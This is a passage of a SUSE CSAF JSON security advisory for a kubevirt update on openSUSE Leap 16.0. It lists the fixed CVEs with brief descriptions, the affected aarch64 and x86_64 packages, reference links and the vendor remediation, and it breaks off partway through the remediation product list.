virt-api and execution of privileged operations\n (bsc#1253186).\n - CVE-2025-64437: mishandling of symlinks can lead to compromising the confidentiality, integrity and availability of data on the host (bsc#1253194).\n - CVE-2025-64324: a logic bug that allows an attacker to read and write arbitrary files owned by more privileged users\n (bsc#1253748).\n\nOther updates and bugfixes:\n\n - Upstream now uses stateless firmware for CoCo VMs.\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "openSUSE-Leap-16.0-319",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2026_20281-1.json"
},
{
"category": "self",
"summary": "SUSE Bug 1241772",
"url": "https://bugzilla.suse.com/1241772"
},
{
"category": "self",
"summary": "SUSE Bug 1253181",
"url": "https://bugzilla.suse.com/1253181"
},
{
"category": "self",
"summary": "SUSE Bug 1253185",
"url": "https://bugzilla.suse.com/1253185"
},
{
"category": "self",
"summary": "SUSE Bug 1253186",
"url": "https://bugzilla.suse.com/1253186"
},
{
"category": "self",
"summary": "SUSE Bug 1253189",
"url": "https://bugzilla.suse.com/1253189"
},
{
"category": "self",
"summary": "SUSE Bug 1253194",
"url": "https://bugzilla.suse.com/1253194"
},
{
"category": "self",
"summary": "SUSE Bug 1253748",
"url": "https://bugzilla.suse.com/1253748"
},
{
"category": "self",
"summary": "SUSE Bug 1257128",
"url": "https://bugzilla.suse.com/1257128"
},
{
"category": "self",
"summary": "SUSE Bug 1257422",
"url": "https://bugzilla.suse.com/1257422"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-45310 page",
"url": "https://www.suse.com/security/cve/CVE-2024-45310/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-22872 page",
"url": "https://www.suse.com/security/cve/CVE-2025-22872/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64324 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64324/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64432 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64432/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64433 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64433/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64434 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64434/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64435 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64435/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64437 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64437/"
}
],
"title": "Security update for kubevirt",
"tracking": {
"current_release_date": "2026-02-27T08:51:11Z",
"generator": {
"date": "2026-02-27T08:51:11Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "openSUSE-SU-2026:20281-1",
"initial_release_date": "2026-02-27T08:51:11Z",
"revision_history": [
{
"date": "2026-02-27T08:51:11Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "kubevirt-container-disk-1.7.0-160000.1.1.aarch64",
"product": {
"name": "kubevirt-container-disk-1.7.0-160000.1.1.aarch64",
"product_id": "kubevirt-container-disk-1.7.0-160000.1.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-manifests-1.7.0-160000.1.1.aarch64",
"product": {
"name": "kubevirt-manifests-1.7.0-160000.1.1.aarch64",
"product_id": "kubevirt-manifests-1.7.0-160000.1.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64",
"product": {
"name": "kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64",
"product_id": "kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64",
"product": {
"name": "kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64",
"product_id": "kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-tests-1.7.0-160000.1.1.aarch64",
"product": {
"name": "kubevirt-tests-1.7.0-160000.1.1.aarch64",
"product_id": "kubevirt-tests-1.7.0-160000.1.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-api-1.7.0-160000.1.1.aarch64",
"product": {
"name": "kubevirt-virt-api-1.7.0-160000.1.1.aarch64",
"product_id": "kubevirt-virt-api-1.7.0-160000.1.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-controller-1.7.0-160000.1.1.aarch64",
"product": {
"name": "kubevirt-virt-controller-1.7.0-160000.1.1.aarch64",
"product_id": "kubevirt-virt-controller-1.7.0-160000.1.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64",
"product": {
"name": "kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64",
"product_id": "kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64",
"product": {
"name": "kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64",
"product_id": "kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-handler-1.7.0-160000.1.1.aarch64",
"product": {
"name": "kubevirt-virt-handler-1.7.0-160000.1.1.aarch64",
"product_id": "kubevirt-virt-handler-1.7.0-160000.1.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64",
"product": {
"name": "kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64",
"product_id": "kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-operator-1.7.0-160000.1.1.aarch64",
"product": {
"name": "kubevirt-virt-operator-1.7.0-160000.1.1.aarch64",
"product_id": "kubevirt-virt-operator-1.7.0-160000.1.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64",
"product": {
"name": "kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64",
"product_id": "kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virtctl-1.7.0-160000.1.1.aarch64",
"product": {
"name": "kubevirt-virtctl-1.7.0-160000.1.1.aarch64",
"product_id": "kubevirt-virtctl-1.7.0-160000.1.1.aarch64"
}
},
{
"category": "product_version",
"name": "obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64",
"product": {
"name": "obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64",
"product_id": "obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "kubevirt-container-disk-1.7.0-160000.1.1.x86_64",
"product": {
"name": "kubevirt-container-disk-1.7.0-160000.1.1.x86_64",
"product_id": "kubevirt-container-disk-1.7.0-160000.1.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"product": {
"name": "kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"product_id": "kubevirt-manifests-1.7.0-160000.1.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64",
"product": {
"name": "kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64",
"product_id": "kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64",
"product": {
"name": "kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64",
"product_id": "kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-tests-1.7.0-160000.1.1.x86_64",
"product": {
"name": "kubevirt-tests-1.7.0-160000.1.1.x86_64",
"product_id": "kubevirt-tests-1.7.0-160000.1.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-api-1.7.0-160000.1.1.x86_64",
"product": {
"name": "kubevirt-virt-api-1.7.0-160000.1.1.x86_64",
"product_id": "kubevirt-virt-api-1.7.0-160000.1.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-controller-1.7.0-160000.1.1.x86_64",
"product": {
"name": "kubevirt-virt-controller-1.7.0-160000.1.1.x86_64",
"product_id": "kubevirt-virt-controller-1.7.0-160000.1.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64",
"product": {
"name": "kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64",
"product_id": "kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64",
"product": {
"name": "kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64",
"product_id": "kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-handler-1.7.0-160000.1.1.x86_64",
"product": {
"name": "kubevirt-virt-handler-1.7.0-160000.1.1.x86_64",
"product_id": "kubevirt-virt-handler-1.7.0-160000.1.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64",
"product": {
"name": "kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64",
"product_id": "kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-operator-1.7.0-160000.1.1.x86_64",
"product": {
"name": "kubevirt-virt-operator-1.7.0-160000.1.1.x86_64",
"product_id": "kubevirt-virt-operator-1.7.0-160000.1.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64",
"product": {
"name": "kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64",
"product_id": "kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"product": {
"name": "kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"product_id": "kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
}
},
{
"category": "product_version",
"name": "obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64",
"product": {
"name": "obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64",
"product_id": "obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "openSUSE Leap 16.0",
"product": {
"name": "openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0"
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-container-disk-1.7.0-160000.1.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.aarch64"
},
"product_reference": "kubevirt-container-disk-1.7.0-160000.1.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-container-disk-1.7.0-160000.1.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.x86_64"
},
"product_reference": "kubevirt-container-disk-1.7.0-160000.1.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-manifests-1.7.0-160000.1.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.aarch64"
},
"product_reference": "kubevirt-manifests-1.7.0-160000.1.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-manifests-1.7.0-160000.1.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.x86_64"
},
"product_reference": "kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64"
},
"product_reference": "kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64"
},
"product_reference": "kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64"
},
"product_reference": "kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64"
},
"product_reference": "kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-tests-1.7.0-160000.1.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.aarch64"
},
"product_reference": "kubevirt-tests-1.7.0-160000.1.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-tests-1.7.0-160000.1.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.x86_64"
},
"product_reference": "kubevirt-tests-1.7.0-160000.1.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-api-1.7.0-160000.1.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.aarch64"
},
"product_reference": "kubevirt-virt-api-1.7.0-160000.1.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-api-1.7.0-160000.1.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.x86_64"
},
"product_reference": "kubevirt-virt-api-1.7.0-160000.1.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-controller-1.7.0-160000.1.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.aarch64"
},
"product_reference": "kubevirt-virt-controller-1.7.0-160000.1.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-controller-1.7.0-160000.1.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.x86_64"
},
"product_reference": "kubevirt-virt-controller-1.7.0-160000.1.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64"
},
"product_reference": "kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64"
},
"product_reference": "kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64"
},
"product_reference": "kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64"
},
"product_reference": "kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-handler-1.7.0-160000.1.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.aarch64"
},
"product_reference": "kubevirt-virt-handler-1.7.0-160000.1.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-handler-1.7.0-160000.1.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.x86_64"
},
"product_reference": "kubevirt-virt-handler-1.7.0-160000.1.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64"
},
"product_reference": "kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64"
},
"product_reference": "kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-operator-1.7.0-160000.1.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.aarch64"
},
"product_reference": "kubevirt-virt-operator-1.7.0-160000.1.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-operator-1.7.0-160000.1.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.x86_64"
},
"product_reference": "kubevirt-virt-operator-1.7.0-160000.1.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64"
},
"product_reference": "kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64"
},
"product_reference": "kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virtctl-1.7.0-160000.1.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.aarch64"
},
"product_reference": "kubevirt-virtctl-1.7.0-160000.1.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virtctl-1.7.0-160000.1.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
},
"product_reference": "kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64"
},
"product_reference": "obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64",
"relates_to_product_reference": "openSUSE Leap 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64 as component of openSUSE Leap 16.0",
"product_id": "openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64"
},
"product_reference": "obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64",
"relates_to_product_reference": "openSUSE Leap 16.0"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-45310",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-45310"
}
],
"notes": [
{
"category": "general",
"text": "runc is a CLI tool for spawning and running containers according to the OCI specification. runc 1.1.13 and earlier, as well as 1.2.0-rc2 and earlier, can be tricked into creating empty files or directories in arbitrary locations in the host filesystem by sharing a volume between two containers and exploiting a race with `os.MkdirAll`. While this could be used to create empty files, existing files would not be truncated. An attacker must have the ability to start containers using some kind of custom volume configuration. Containers using user namespaces are still affected, but the scope of places an attacker can create inodes can be significantly reduced. Sufficiently strict LSM policies (SELinux/Apparmor) can also in principle block this attack -- we suspect the industry standard SELinux policy may restrict this attack\u0027s scope but the exact scope of protection hasn\u0027t been analysed. This is exploitable using runc directly as well as through Docker and Kubernetes. The issue is fixed in runc v1.1.14 and v1.2.0-rc3.\n\nSome workarounds are available. Using user namespaces restricts this attack fairly significantly such that the attacker can only create inodes in directories that the remapped root user/group has write access to. Unless the root user is remapped to an actual user on the host (such as with rootless containers that don\u0027t use `/etc/sub[ug]id`), this in practice means that an attacker would only be able to create inodes in world-writable directories. A strict enough SELinux or AppArmor policy could in principle also restrict the scope if a specific label is applied to the runc runtime, though neither the extent to which the standard existing policies block this attack nor what exact policies are needed to sufficiently restrict this attack have been thoroughly tested.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-45310",
"url": "https://www.suse.com/security/cve/CVE-2024-45310"
},
{
"category": "external",
"summary": "SUSE Bug 1230092 for CVE-2024-45310",
"url": "https://bugzilla.suse.com/1230092"
},
{
"category": "external",
"summary": "SUSE Bug 1257413 for CVE-2024-45310",
"url": "https://bugzilla.suse.com/1257413"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64",
